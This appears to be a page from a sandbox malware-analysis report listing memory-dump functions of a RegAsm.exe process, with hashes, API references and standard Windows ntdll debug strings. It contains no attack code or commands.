Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Function 022EFC30 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Function 022EFC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Function 022EFC48 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Function 022F0C40 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Function 022EFC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Function 022EFD5C Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Function 022EFD8C Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Function 022F1D80 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Function 02318788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON

Download Yara Rule

APIs

_wcspbrk.LIBCMT ref: 02318891
_wcspbrk.LIBCMT ref: 02318979
_wcspbrk.LIBCMT ref: 02318A61
_wcspbrk.LIBCMT ref: 02318A9B
_wcspbrk.LIBCMT ref: 02361B9C

Strings

WindowsExcludedProcs, xrefs: 023187C1
Kernel-MUI-Language-Allowed, xrefs: 02318827
Kernel-MUI-Number-Allowed, xrefs: 023187E6
Kernel-MUI-Language-SKU, xrefs: 023189FC
Kernel-MUI-Language-Disallowed, xrefs: 02318914

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: e32b4ebd5f8c2e92e157748568088497affeec3ce5a6988382607b668dc954a7
Instruction ID: ac15fd17c4bb23f4e8f228e09d7387f26328fa602937863a76f77bd8a2194ac8
Opcode Fuzzy Hash: e32b4ebd5f8c2e92e157748568088497affeec3ce5a6988382607b668dc954a7
Instruction Fuzzy Hash: 6DF113B2D00209EFDB55DFD8C9849EEBBB9BF08304F14846AE605A7621E7349A45DF60

Function 023313CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0233146B
___swprintf_l.LIBCMT ref: 02331490
___swprintf_l.LIBCMT ref: 0235E970

Strings

:%u.%u.%u.%u, xrefs: 0235E9F4
::%hs%u.%u.%u.%u, xrefs: 0235E967
ffff:, xrefs: 0235E94B
::ffff:0:%u.%u.%u.%u, xrefs: 0235E9B0

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 8515bfb39c4ad542051fb6e7af01359bf7e27370bea951cca881f0509b632ca9
Instruction ID: 55873b3b59d7d81323d36a69c64ef1b30f21bf6fd3993815ef9c5803539c00b8
Opcode Fuzzy Hash: 8515bfb39c4ad542051fb6e7af01359bf7e27370bea951cca881f0509b632ca9
Instruction Fuzzy Hash: D36104B1E04665AADF35DF99C8809BEBBB6EF84310B14C12DE9DE47540D734A740CB60

Function 02327EFD Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON

Download Yara Rule

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02343F12

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 0234E345
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0234E2FB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02343F75
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02343F4A
Execute=1, xrefs: 02343F5E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02343EC4
ExecuteOptions, xrefs: 02343F04
'S, xrefs: 02327F1E

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$'S
API String ID: 3901378454-944296841
Opcode ID: 27b444df6a2628957f80e8498c51e69d7ed1dec5be495e5c700844f8c1658c9a
Instruction ID: 5137c5a1ce562ca61bae84b0f78dc63b5bfd35ecde718946efaed3509b9f8ead
Opcode Fuzzy Hash: 27b444df6a2628957f80e8498c51e69d7ed1dec5be495e5c700844f8c1658c9a
Instruction Fuzzy Hash: 9E41A97169031DBAEB20DA94DCC5FDAB3FDAF15704F0005E5E605E6081EB70EA458F61

Function 02330B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 02330BF6
__fassign.LIBCMT ref: 02330CA2

Strings

:, xrefs: 02330AC7
:, xrefs: 02330BA9
., xrefs: 02330A0C

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: b31c25c61a207ffa525e000487b89ced88b4f68c573173bf5f5dc84ae93563c1
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 6BA1AC71D0421AEFCF2ECF64C8457BEB7B9AF05309F28846AD852AB282D7349745CB51

Function 02330554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02352206

Strings

RTL: Re-Waiting, xrefs: 0235223A, 02352328
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0235220E
RTL: Resource at %p, xrefs: 0235221D, 0235230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023522FC

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 201b90f1769bacba9ca4e0700586fb29cad3ec643a314eae77765e7afa2da6ad
Instruction ID: 2a57b3f439bca921e285f7cbdb70df49ed905d294a651385765b0e8349244890
Opcode Fuzzy Hash: 201b90f1769bacba9ca4e0700586fb29cad3ec643a314eae77765e7afa2da6ad
Instruction Fuzzy Hash: C45128357003116FEB25CA58CC81FA773AAAF84720F258269FD59DB285DB71ED42CB90

Function 023314C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0235EA22

Part of subcall function 023313CB: ___swprintf_l.LIBCMT ref: 0233146B
Part of subcall function 023313CB: ___swprintf_l.LIBCMT ref: 02331490

___swprintf_l.LIBCMT ref: 0233156D

Strings

]:%u, xrefs: 0235EA47
%%%u, xrefs: 02331564

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: b5e9ddabd675d4107a010c7a21d82718fd8091903cfc0a9b88a77ad096a880f3
Instruction ID: cc2f209394c522cb672a4ccd1d58b44bead7b27d96d24ee60cbe591955c08fc8
Opcode Fuzzy Hash: b5e9ddabd675d4107a010c7a21d82718fd8091903cfc0a9b88a77ad096a880f3
Instruction Fuzzy Hash: 792195739002299BEB22DF68CC40AEBB3ADBB50714F444565FD8AD3144DB71EB588BD1

Function 023153A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023522F4

Strings

RTL: Re-Waiting, xrefs: 02352328
RTL: Resource at %p, xrefs: 0235230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023522FC

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: ae862ce03c7370e7c840bdccf4bcccb602a19155066503b8e19ab911e1b4e1a7
Instruction ID: 51feb8606aef6abc9d717388f7e6cbdc91b3da13e502a136ca3c33fd72e811b9
Opcode Fuzzy Hash: ae862ce03c7370e7c840bdccf4bcccb602a19155066503b8e19ab911e1b4e1a7
Instruction Fuzzy Hash: 5C5106716117116BEF25DB68CC80FA773E9AF84324F104669FD49DB280EB71E941CBA0

Function 0231EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 023524FA
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023524BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0235248D

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 4fac2ee2c9e0ab4cc52eafa6860ae1a9223b7ceccae2916b207f5cedbc96d9ee
Instruction ID: 87725fbb56044e09a795c0bd646a6d0d5b2511f00cdd36464b00559f9e7e3a81
Opcode Fuzzy Hash: 4fac2ee2c9e0ab4cc52eafa6860ae1a9223b7ceccae2916b207f5cedbc96d9ee
Instruction Fuzzy Hash: A441C4B0A00314ABDB34DBA8CC85F6B77AAAF44320F108655FE599B2C1D735E941CB61

